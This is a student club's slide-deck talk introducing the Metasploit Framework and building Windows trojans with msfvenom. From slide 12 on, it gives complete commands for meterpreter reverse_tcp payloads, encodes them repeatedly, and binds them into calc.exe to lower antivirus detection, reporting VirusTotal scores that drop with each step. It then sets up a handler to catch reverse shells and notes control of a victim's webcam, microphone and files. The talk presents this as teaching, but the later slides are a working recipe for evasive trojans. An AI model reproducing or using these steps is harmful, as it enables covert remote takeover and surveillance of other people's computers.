Anonymous club of BMSCE, Talk and Demo on exploits on the Metasploit Framework and building Trojans using Msfvenom . By Siddharth.K (tech Head of anonymous club BMSCE)

1. Siddharth.K
Dept of EEE BMS College of Engineering
Anonymous Club BMSCE
INTRODUCTION TO EXPLOITS IN
METASPLOIT AND PAYLOADS IN
MSFVENOM

2. What is Metasploit..?
The Metasploit Project is an open source project that
provides a public resource for researching security
vulnerabilities and developing code that allows a
network administrator to break into his own network to
identify security risks and document which
vulnerabilities need to be addressed first.
It is a collection of tools, which are used for
Information gathering, Scanning Network, Performing
Exploits, etc.

3. Rapid 7 is the company that maintains and provides
with updates for Metasploit.
An open source version of Metasploit comes inbuilt in
the Kali Linux Distribution known as the Metasploit
Framework.
Metasploitable is the Testing Environment provided by
Metasploit to test and run exploits and payloads.

4. General workflow of how to use Metasploit
Framework in Kali Linux Distribution
1. Run the command ‘service postgresql start’ from
your privileged command prompt, this starts up a
database to store metasploit exploits and this
makes the procedure run faster.
2. Type the command ‘msfconsole’ on the command
prompt to start up the Metasploit Framework.
3. Type the ‘?’ symbol to open up the help menu and
any point of time in the Framework

5. 4. Searching Exploits -
Type in the command ‘show exploits’ from the
cmd, this gives a list of all the exploits present in the
Framework.
To filter results for any particular exploits, type
in ‘search’ and the exploit, e.g. ‘search windows’ this
returns all the windows exploits present in metasploit.

6. 5. Gathering information on the exploit - Once the
exploit has been found, more information is needed.
This includes the parameters needed to run the exploit
and a general description of the exploit. This can be
done by typing ‘info <exploit name>’

7. 6. Running the exploit - Once suitable information is
gathered, the exploit can be run by ‘use <exploit
name>’, inside the exploit the ‘show options’ command
can be used to check the parameters needed.
This is the general workflow or steps needed to be
followed to run any exploit in the Metasploit
Framework

8. General Tools used for Information Gathering
needed to run Metasploit Exploits
1. ‘whois’ - a query and response protocol that is
widely used for querying databases that store the
registered users or assignees of an Internet
resource, such as a domain name, an IP address
block, or an autonomous system, but is also used
for a wider range of other information.
1. ‘Nmap’ - Nmap is a security scanner, used to
discover hosts and services on a computer
network, thus building a "map" of the network.
Demo on 3 kinds of Exploits

9. What is MSFVENOM… ?
msfvenom is a combination of Msfpayload and
Msfencode, putting both of these tools into a single
Framework instance. msfvenom replaced both
msfpayload and msfencode as of June 8th, 2015.
The advantages of msfvenom are:
1. One single tool.
2. Standardized command line options.

10. Difference between Exploit and Payload
The exploit is what delivers the payload. Take a missile as an
analogy. You have the rocket and fuel and everything else in the
rocket, and then you have the warhead that does the actual
damage. Without the warhead, the missile doesn't do very much
when it hits. Additionally, a warhead isn't much use if it goes off in
your bunker without a rocket delivering it.

12. Ways of creating MSFVenom Trojans
Msfvenom -h to show the help menu with the tunable
parameters with their description
General Syntax to create Payloads -
Msfvenom -p <Payload> LHOST=<Local Host IP>
LPORT=<Local Port Number> -f <type of
excecutable> ><PATH>
Payload - windows/meterpreter/reverse_tcp, opens up a
reverse meterpreter session.
LPORT used - 443

13. 1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip from
ifconfig> LPORT=443 -f exe >out1.exe
2. Using Encoders - To find encoders present in msfvenom, ‘msfvenom -l
encoders’
Encoder Used - x86/shikata_ga_nai
-i - Number of iterations to run the Encoding operation
Msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip from
ifconfig> LPORT=443 -e x86/shikata_ga_nai -i 200 -f exe >out2.exe
3. Using Template - Binding payload to a template file, template file
used
‘Calc.exe’ windows 10 exe.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip>
LPORT =
443 -f exe -x ./calc.exe >out3.exe
4. Using the -k [keep] parameter on carrier template and encoders -
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip>
LPORT =
443 -e x86/shikata_ga_nai -i 200 -k -f exe -x ./calc.exe >out4.exe

14. Testing the Trojans created
Pass the 4 trojans and test them on a Virus Scanner
tool, here i have used the VirusTool online Virus
Scanner.
www.virustotal.com
Upload the 4 Trojans and observe the results,
out3.exe and out4.exe have lesser chance of being
detected by the anti-viruses. These were just demos of
using templates to hide payloads into applications

15. 1. Out1.exe - 48/56
2. Out2.exe - 42/56
3. Out3.exe - 34/56
4. Out4.exe - 29/56

16. Deploying payloads to Victim and getting
Reverse Shell connection and opening
Meterpreter Session in Metasploit
1. msfconsole
2. Use exploit/multi/handler
3. Set payload windows/meterpreter/reverse_tcp
4. Show options
5. Set LHOST
6. Set LPORT
7. Show options
8. exploit

18. Now we have a reverse connection and the
meterpreter session is open, now if we type the ‘help’
command, we’ll see the help menu and can execute
commands remotely on the Victim machine , like
control web_cam, record from mic,dump files,etc.

19. References
1. http://www.metasploit.com
2. https://www.offensive-security.com/metasploit-
unleashed/msfvenom/
3. The secret life of Trojans by Peter Zsiros
4. Metasploit - Bucky Roberts